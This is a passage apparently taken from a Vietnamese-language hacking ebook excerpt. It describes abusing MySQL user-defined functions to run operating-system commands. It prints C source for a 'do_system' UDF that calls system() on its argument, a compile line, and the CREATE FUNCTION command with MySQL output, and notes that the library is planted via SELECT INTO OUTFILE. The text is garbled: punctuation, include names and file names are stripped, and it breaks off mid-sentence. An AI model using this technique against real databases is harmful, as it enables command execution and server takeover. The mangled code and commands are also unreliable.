Tham khảo tài liệu 'hacker professional ebook part 267', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả | được định rõ hoặc UDFs . Cơ chế này được truy xuất bởi câu lệnh CREATE FUNCTION dẫu cho những entry trong table có thể được đưa vào thủ công. Thư viện có chứa hàm phải được sử dụng từ đường dẫn mà MySQL sẽ lấy bình thường khi nhập vào 1 dynamically loaded library. 1 kẻ tấn công sẽ lạm dụng cơ cấu này bằng cách tạo 1 thư viện malicious và sau đó viết nó tới 1 thư mục thích hợp có sử dụng câu lệnh SELECT . INTO OUTFILE. Khi thư mục được đặt vào kẻ tấn công cần update hoặc insert truy xuất đến table để cấu hình cho MySQL nhập vào thư viện và thi hành các function hàm chức năng . Mã nguồn cho 1 thư viện UDF làm ví dụ được chỉ ra dưới đây include include compile with something like gcc -g -c then gcc -g -shared -W1 -soname -o -lc enum Item_result STRING_RESULT REAL_RESULT INT_RESULT ROW_RESULT typedef struct st_udf_args unsigned int arg_count Number of arguments enum Item_result arg_type Pointer to item_results char args Pointer to argument unsigned long lengths Length of string arguments char maybe_null Set to 1 for all maybe_null args UDF_ARGS typedef struct st_udf_init char maybe_null 1 if function can return NULL unsigned int decimals for real functions unsigned long max_length For string functions char ptr free pointer for function data char const_item 0 if result is independent of arguments UDF_INIT int do_system UDF_INIT initid UDF_ARGS args char is_null char error if args- arg_count 1 return 0 system args- args 0 return 0 Hàm chức năng này có thể được thêm vào MySQL như sau mysql create function do_system returns integer soname Query OK 0 rows affected sec Table sau đó sẽ giống như sau bạn cũng có thể tự cập nhật mysql select from ---------- --- ------------ -------- name ret dl type --------- ----- -_--------- -------- do_system 2 function ---------- ----- ---------- -------- 1 row in set sec And then the .
